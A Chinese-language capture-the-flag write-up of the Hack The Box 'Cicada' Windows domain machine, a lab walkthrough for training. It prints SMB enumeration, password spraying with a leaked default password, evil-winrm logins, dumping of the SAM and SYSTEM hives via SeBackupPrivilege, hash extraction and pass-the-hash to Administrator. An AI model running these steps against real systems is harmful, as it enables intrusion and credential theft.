靶机概览
目标地址:
10.10.11.35
端口扫描
先进行 UDP 扫描
nmap -sU --min-rate 10000 10.10.11.35
UDP 扫描没有发现太多可直接利用的信息,但可以记录下 389 端口。接着进行 TCP 全端口扫描:
nmap -sT -p- --min-rate 10000 10.10.11.35
扫描结果显示开放了多个典型 Windows 域环境端口,包括 53、88、135、139、389、445、464、593、636、3268、3269、5985 等。其中 445 表示 SMB 可访问,5985 表示 WinRM 服务开放。
为了整理可用端口,可以从扫描结果中提取开放端口:
grep open ports | awk -F/ '{print $1}' | paste -sd ,
可以对开放端口跑一次 NSE 漏洞脚本
nmap --script=vuln -p53,88,135,139,389,445,464,593,636,3268,3269,5985,60304 10.10.11.35
这里没有直接可用的漏洞,但先前发现开放了 445 端口,重点转向 SMB 枚举。
SMB 匿名访问与 HR 共享枚举
先检查 SMB 是否允许匿名访问
smbclient -N -L 10.10.11.35
结果中可以看到 HR 共享目录可访问。继续枚举 SMB 信息
enum4linux -a -u guest 10.10.11.35
结果中可以看到 HR 共享目录可访问。继续枚举 SMB 信息:
enum4linux -a -u guest 10.10.11.35
在 HR 共享中发现了新员工通知文件,内容:
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
这泄露了一串默认密码,Your default password is: Cicada$M6Corpb*@Lp#nZp!8。下一步需要枚举域用户并测试哪些账号可能仍在使用该密码。
域用户枚举与凭据验证
通过 RID Brute 枚举用户
crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute
枚举到的用户包括:
Administrator
Guest
krbtgt
Domain
Protected
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
将用户列表和默认密码组合验证
crackmapexec smb 10.10.11.35 -u user -p pass --continue-on-success
验证结果显示 michael.wrightson 可以使用该默认密码登录。接下来检查该账号对共享目录的访问权限。
DEV 共享与二次凭据发现
使用 michael.wrightson 查看共享目录后,可以看到新的 DEV 共享,但该账号没有读取权限。同时该账号也无法直接通过 WinRM 获取 shell。
继续进行凭据验证
crackmapexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
发现 david.orelious 拥有可用密码,该账号可以访问 DEV 共享。进入共享目录并下载可疑文件
打开文件后发现了新的账号密码信息,指向 Windows 域用户 emily.oscars。
WinRM(Windows Remote Management)是 WS-Management 协议的 Microsoft 实现,该协议是基于 SOAP 的标准简单对象访问协议的防火墙友好协议,允许不同供应商的硬件和操作系统之间进行互操作。
WinRM 初始访问
由于 5985 端口开放,可以使用 evil-winrm 尝试远程登录:
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p '<password>'
登录成功后获得初始 shell,可以读取用户目录下的 user flag。
SeBackupPrivilege 权限分析
拿到 shell 后,先查看当前用户权限:
whoami /priv
可以看到当前用户具备 SeBackupPrivilege。SeBackupPrivilege 是 Windows 操作系统中的一个特权,这个权限允许用户以备份方式读取受 ACL 保护的文件。在 Windows 提权场景中,它通常可以用于导出 SAM 和 SYSTEM 注册表配置单元,随后离线提取本地账户 Hash。
SeBackupPrivilege利用思路是
备份 `HKLM\SAM`
备份 `HKLM\SYSTEM`
下载到本地
使用 `impacket-secretsdump` 提取 NTLM Hash
使用本地管理员 Hash 登录
根据思路继续尝试
导出 SAM/SYSTEM 并提取 Hash
在 WinRM shell 中导出注册表文件
reg save hklm\sam C:\Users\emily.oscars.CICADA\Desktop\sam
reg save hklm\system C:\Users\emily.oscars.CICADA\Desktop\system
通过 evil-winrm 下载文件
download sam
download system
在本地使用 impacket-secretsdump 提取 Hash
impacket-secretsdump -sam sam -system system local
拿到本地管理员 NTLM Hash 后,可以使用 Pass-the-Hash 登录目标机器。
使用 Hash 登录并读取 Root Flag
使用管理员 Hash 登录。
evil-winrm -i 10.10.11.35 -u Administrator -H '<administrator_ntlm_hash>'
登录后进入管理员桌面目录,读取 root flag 即可。
参考
- www.hackthebox.com/machines/ci…
- pittsec.io/hackthebox-…
- motasem-notes.net/hackthebox-…
- pwn2ooown.tech/writeup/202…
免责声明
本文章所涉及仅供技术研究和学习之用。所有操作仅在合法授权的环境中进行,绝不用于任何非法活动。作者对因本文章内容导致的任何后果不承担责任。请读者务必遵守相关法律法规,合理使用本知识。
如果你对本文内容感兴趣,欢迎关注我的公众号 “Sh1n Sec”,获取更多网络安全、漏洞分析等相关内容。如对于文章中的技术细节有疑问、附件有需要,欢迎私信我,我会尽量帮助解答。期待与您的交流!
